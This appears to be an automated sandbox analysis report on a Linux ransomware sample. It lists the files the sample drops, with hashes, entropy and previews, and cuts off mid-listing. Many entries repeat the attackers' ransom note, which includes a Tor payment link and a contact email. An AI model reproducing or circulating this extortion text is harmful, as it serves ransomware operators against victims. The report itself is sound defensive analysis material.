                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.

                                /run/systemd/users/.#12768ksT9

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):282
                                Entropy (8bit):5.279590293533198
                                Encrypted:false
                                SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0IxffhTgFeV9VQ2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibBhgIV9JthQHtPYq9M
                                MD5:6B21982BCD5585E718C406167E20B59E
                                SHA1:5D2F5FFE0E90CC0AFE2798FA63C02CF8D8D6CF6B
                                SHA-256:8A0C7B3BEAE9BE0AE115616F1F148B7ADA0BC828D5350C08C2202D0178A2B638
                                SHA-512:901BDBE2704C8ED05CC6AF60E57661A44CB89F465C1047BF78A184547B091766CDADC621A25FE77E043FB646705FD45BF75CD5B02DA2EE34EF53FBDC33AC00C3
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11918.REALTIME=1730729883282672.MONOTONIC=427082307.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.

                                /run/systemd/users/.#127HzAnO8

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):282
                                Entropy (8bit):5.279590293533198
                                Encrypted:false
                                SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0IxffhTgFeV9VQ2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibBhgIV9JthQHtPYq9M
                                MD5:6B21982BCD5585E718C406167E20B59E
                                SHA1:5D2F5FFE0E90CC0AFE2798FA63C02CF8D8D6CF6B
                                SHA-256:8A0C7B3BEAE9BE0AE115616F1F148B7ADA0BC828D5350C08C2202D0178A2B638
                                SHA-512:901BDBE2704C8ED05CC6AF60E57661A44CB89F465C1047BF78A184547B091766CDADC621A25FE77E043FB646705FD45BF75CD5B02DA2EE34EF53FBDC33AC00C3
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11918.REALTIME=1730729883282672.MONOTONIC=427082307.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.

                                /run/systemd/users/.#127LWpP9a

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):4.928997328913428
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs5BuSgVuMI2sKiYiesnAv/XS12K2hwEY8mTQ2pJi22sQ2KkmD2pi:SbFuFyL3BVgVuR257iesnAi12thQc2p4
                                MD5:065A3AD1A34A9903F536410ECA748105
                                SHA1:21CD684DF60D569FA96EEEB66A0819EAC1B2B1A4
                                SHA-256:E80554BF0FF4E32C61D4FA3054F8EFB27A26F1C37C91AE4EA94445C400693941
                                SHA-512:DB3C42E893640BAEE9F0001BDE6E93ED40CC33198AC2B47328F577D3C71E2C2E986AAAFEF5BD8ADBC639B5C24ADF715D87034AE24B697331FF6FEC5962630064
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.

                                /run/systemd/users/.#127RdFnQb

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):223
                                Entropy (8bit):5.463137079838033
                                Encrypted:false
                                SSDEEP:6:SbFuFyL3BVgdL87ynAir/0IxffqgFeV9Rt6fr:qgFq30dABibBigIV9RIfr
                                MD5:8D0867B441C73D320461B346F46539C2
                                SHA1:8416B47417BB4BC9B1B7A99AC6B279AA46AE3BC6
                                SHA-256:5CCC79488023D8289728EDB103FAE812A93CB3F234539A974E897EB435A29572
                                SHA-512:A70A70EBBCC40CF2718CBDFBB4E0B47BC66208762FB20680FE64BE0F48596192400D3BFBBA24F113B45EEBF661BA37C85732D95C6E24027050B5B82779A40A7A
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11980.REALTIME=1730729883282672.MONOTONIC=427082307.LAST_SESSION_TIMESTAMP=427172954.

                                /run/systemd/users/.#127jPkZqb

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):174
                                Entropy (8bit):5.294944126693173
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs5BuSgdNR2sKiYiesnAv/XSHxJgFVoVegq+WkKo206qod5UkcQJn:SbFuFyL3BVgdL87iesnAiRJgFeV9Rt6z
                                MD5:7D4B5D9AA6BA025B20F157EEED5A45D1
                                SHA1:A8314EEBC2A1119D732BC9CDDB995AC411691C3F
                                SHA-256:39466696F27D21069259164FD0A6E68034A5ACB8555E7D63810AD88FDAAF5126
                                SHA-512:727726F047C824C49BC128371B89730CA6B54C23BB59D7CCB1D87F0A41A92BD1A89D2A12BF73BA76A4F2C283D70BBE29CA9F78179FF039CCACCC3FD4E9EAB814
                                Malicious:false
                                Preview:# This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=no.RUNTIME=/run/user/127.REALTIME=1730729883282672.MONOTONIC=427082307.LAST_SESSION_TIMESTAMP=427172954.

                                /run/user/1000/ICEauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):462
                                Entropy (8bit):7.396383360371341
                                Encrypted:false
                                SSDEEP:12:ad9N6PjjIm5HPCDxtfLUYJiDTbi17YTcO:XPcaXDqO
                                MD5:5C1D7B5667C2E57145DDFBD87D6BDABC
                                SHA1:BBA8A700E3768855E22C64C3A376D15201655D86
                                SHA-256:DBB1A6B1CEB185138A12197FE32199CB70ED70C495748A432952663722BF18BD
                                SHA-512:FBED07CC08C3CC2C7966E87172B95D6C86F793C7287D31006E7EEF960B8148343ACB150103B623A954C9EBC07C6FF29BAAB5CDFF927A6E54F991FCEC8A6B1B2D
                                Malicious:false
                                Preview:V...=A.B'....;....n.D+h....$H..'hfS.............D#....o?...A.K7....'G.mQ.x._.._3J.d`.>J...I$x..^N.\...V...S..4...I...`%~...6..n./.+XW..MAa..A.=.}N..h..W...RO.].....j.X1.7.& .."...^.D...6!k.Z.3../..I.9lC...>.v.+.%;/1..J9o.I.d...B..0fu.s...?I.I)..Gf[(O.8.@q....N.f.~......H$s.{.z....#.Wo.Z.R..P.....J.?.<...!2A........(...................F........B..h....C. u.j...K....Q B.^.F.>.b...t.......i..`.l....F..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/user/1000/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/1000/dconf/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/1000/dconf/user

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):138
                                Entropy (8bit):5.685807260226307
                                Encrypted:false
                                SSDEEP:3:cl3ll/lslHlj6lY5b0R/NesG/RqqwPlq6KqkzlazrT31zAn:XMC5I7NG/MJwqkcj31E
                                MD5:3C82A8294591FAA80F5A7CBF0587F9AC
                                SHA1:452CE410CDADBCA097E1DE8E4D2AF69ADD24C99B
                                SHA-256:75B236EE7C2DD53D76CC7E352C5DAA9158C3E73A7173BFAB1BCE1C7739CDDD9B
                                SHA-512:760A4C982E7C8B78467099B6A2B12CE63591910138CD1AB484F85A8AB845E9245E9D528DA3DB2AA402742A4C0E10C9222AC4A4804CABB991A78F7DED8684F2D3
                                Malicious:false
                                Preview:m..!2A........(................................r.*........W.K.=...I.&.q..7.}..(..Z.=.O3]......*.#j@.,E..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/user/1000/gdm/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/1000/gdm/Xauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):6.327796569081835
                                Encrypted:false
                                SSDEEP:3:5vz2wegN6+D/+43exuG54bvGeBn:Fz2weg0+D26eJ54bv5B
                                MD5:ACD99E99906CD2F6E50B613FDB1F4F63
                                SHA1:B3797FE1BF63235866D6F9C5FC05BA3A73B68A01
                                SHA-256:C06F3D22E6C3066355D6F6FBC18573F80DEA8E3B3E3792EEC31B66896FBB75F5
                                SHA-512:B4E91B0BCED48B69336CD50779893EC7754CDCBCB8804B32508A634AC1F6B1DF02CD7309D3FD514762C0E0A3433DF34632953DE9CD1A9DE0733A158C182EC84B
                                Malicious:false
                                Preview:.6....y.b!.g.\.U;Ep.}.......#^.....%"...8*..lj..A.@...a.Xh5.../.$..33....J.;..~.S..]..a.j2/y(......

                                /run/user/1000/inaccessible/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/1000/pulse/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/1000/pulse/pid

                                Download File
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):2.321928094887362
                                Encrypted:false
                                SSDEEP:3:cJ:cJ
                                MD5:C8037FEC3A7C9DD631FE850CEDA403FC
                                SHA1:E463D3DDDBDACF8E4585F86EB4E8FB7F85AEBDBF
                                SHA-256:8D685D30F9A35A21BDCEF69463CDBA0C4FBF3B1A856D6EE242EAC3C135F97E24
                                SHA-512:7334BB7C37253A78061C4152AF6ADD9709FAB63398D4FA7476D0E6036B9D2F9297C28AB89F8D1A491C15AA85247BD49E10DE679362EC7EEE58714D16859B292F
                                Malicious:false
                                Preview:6324.

                                /run/user/127/ICEauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):788
                                Entropy (8bit):7.64058962274705
                                Encrypted:false
                                SSDEEP:24:Fp2hwYT0pvZX08umxEUC/Diw2dfgc8yuvO:Fp2aYT01RuQCS58yuvO
                                MD5:F2E5CED3C9662F8C7C6DA7BA1F4D1907
                                SHA1:992FE6D1F25D6357AC3408DE44E90D2EFAC672D8
                                SHA-256:512F64E6656DE0256971D35688CCED0564AEEA6F3FE4023CAD3816FE993CCC54
                                SHA-512:D37DE51DD207487991DDEA57F6CC05DCFDC654E92C1216327F357B42EDC97C7F81AEEA5977C47AECAF70CBB5D046607B1564412D222DC565F9E4D5CF93651F02
                                Malicious:false
                                Preview:9.._...g...4).._VL.[....(.}..M..bb.g...C.w....VZ.20....S.bqU..0LF...F@.b.q...k....m...M...V..K...)....'_....G.....'..b.[...LO.D...7.g...U...?!...h$..~X.M.T.......C$.#.57.m.......%o.W..vxU...'....C.2..;....To...jJ.....]#..;...^.....+....an..T.u2/s..n.G .....1]......../..L..F_..WX.*..Mu.;..Mi.9.:.........}.|x.t...`...X..PBN.S.|~F..8.\...MH....5.1B...g.:.....~...1B.%...H..........%......[o.........Q\.P..F...*.....A..%.~-..:.'K.......Ux.s.............*..t.7.0#F;9...vN0..w.F(iU.,.X....[H..G]c!.1n"s.h.N.KL...;Tf.!.`.t..IT....i....I5..QN.(.5..V@..d... ....]6^..Uk..=.P..>./...6..}..x.V.c;;..R..mD.>:6...;`Sp.[.E..5.%...j|&9.....:...!2A........(.............................RN.w.?.G(...S\K1..C.x....O.l|..*KeD.......Hs..XV.......82..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/user/127/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/dconf/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/dconf/user

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):138
                                Entropy (8bit):5.605955448569395
                                Encrypted:false
                                SSDEEP:3:Hr/3ll/lslHluApaC7FeGIKpAG1fDP6eRJKqkzlazrT31zAn:+sAH7sG//pPFyqkcj31E
                                MD5:4758B5D8D841D842EB1FB890D50CCBE6
                                SHA1:89DF3944BD8210A6C2BE76100232B298A93EE367
                                SHA-256:4B2353F7A36B0266C14F300A61894913CC018A04C95E2F0BC95B78949446E90F
                                SHA-512:E5C3E8291054225462997C479C9D9F055C71F32E47F4A0452C72E446D4F5E6DC7CA4F0668D05004FEF3AC74CFC13400039E30DC25FDD0FED56F782DA0554E1AB
                                Malicious:false
                                Preview:.'.!2A........(.............................d[._M..oT/d.H...p..f.....^c.._\...?.Hy.eS.kr.Y.....A#.&*)..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/user/127/gdm/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/gdm/Xauthority

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):104
                                Entropy (8bit):6.327796569081834
                                Encrypted:false
                                SSDEEP:3:0eqn7QpgdBssDlcm38NPe4dS95WviloPYGhTOi5MQqn:pq7QpgDsMG5Pe4dS4aNGhTOiW
                                MD5:83B93C614F80A657CF6949E9C5865B9F
                                SHA1:71F24976BFFA9CD70AC148027C978F29911C0397
                                SHA-256:798D2A7B360225CBD9AF5CD88D235FFFCF16E27378262FF8E89A1ADD75741FDE
                                SHA-512:88F3D7B4034ACE28B2C82DD87BA92A0725A440ECED086F6E7E925B8C58FE56D7389EFA8BA6328885745111C28E8756CD77B3B4EA0B2E3281E0833984D42DAFA1
                                Malicious:false
                                Preview:_|B6..8?{.T...m.A..c..h4$Ip.<.@-...y.7...G9...`R|..-....}.x">iv..X..o.]>..G.F..=`F..<.....[t$!..&.)..

                                /run/user/127/gnome-shell/runtime-state-LE.:0/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/gnome-shell/runtime-state-LE.:0/screenShield.locked

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):137
                                Entropy (8bit):5.62113446891558
                                Encrypted:false
                                SSDEEP:3:bkn/3ll/lslslCVh8fblat99kpY+JuqxSvKqkzlazrT31zAn:An6ECLFt99kVxPqkcj31E
                                MD5:3339658B002709C9CF05437103C75EF0
                                SHA1:E40A1E475BEAF09927721AF6FA2E168C4D6CF1B7
                                SHA-256:6404A7B1E3CEC9F7CD66B92D37AFFC7286BE5D4FC39CBDE750CFC62529E1B789
                                SHA-512:5B83AA600C93A74C9BEFB83B7E23A1E8CF77D74417E173FD142C78BC88C69FB3CDB56B3C8E6E75869AC0D73CF1A8771FEE38758E5BCFBF51BBE9846F5162E4EA
                                Malicious:false
                                Preview:..!2A........(.............................p./....r..{`(.-.X"..}....[.i..z.m....I.8.&. .!oX.....w. ..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/user/127/inaccessible/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/pulse/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/user/127/pulse/pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):141
                                Entropy (8bit):5.784304113914251
                                Encrypted:false
                                SSDEEP:3:rIU+knll3ll/lslolt4oWmROCUDQTJLiP06hr+T23fKqkzlazrT31zAn:cUD64WLmM7P06hr6qkcj31E
                                MD5:CB3096B8012710E2B53F83AD6DA38E73
                                SHA1:C13D8D5487C74574AAEE8C2DDF71A1ABC40C44DF
                                SHA-256:5BE47DAC8F8CF85B705F5BEC6132119BE4E381157C50D1BF9D492D8CE46D2E58
                                SHA-512:7BA45E1B5EFDEAB029BDDE456E821B90155EF9966C05D988CC9BD7E1BF7A9F7DD0F9C3BA578DFFB39A9292DA61A5AC247739F6E5E2724295A1B2BDA383D85B12
                                Malicious:false
                                Preview:.,.m..!2A........(...........................k..jq.so.....1.....d.....G..W.........U..v..hP..>..B..5S...WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/utmp

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
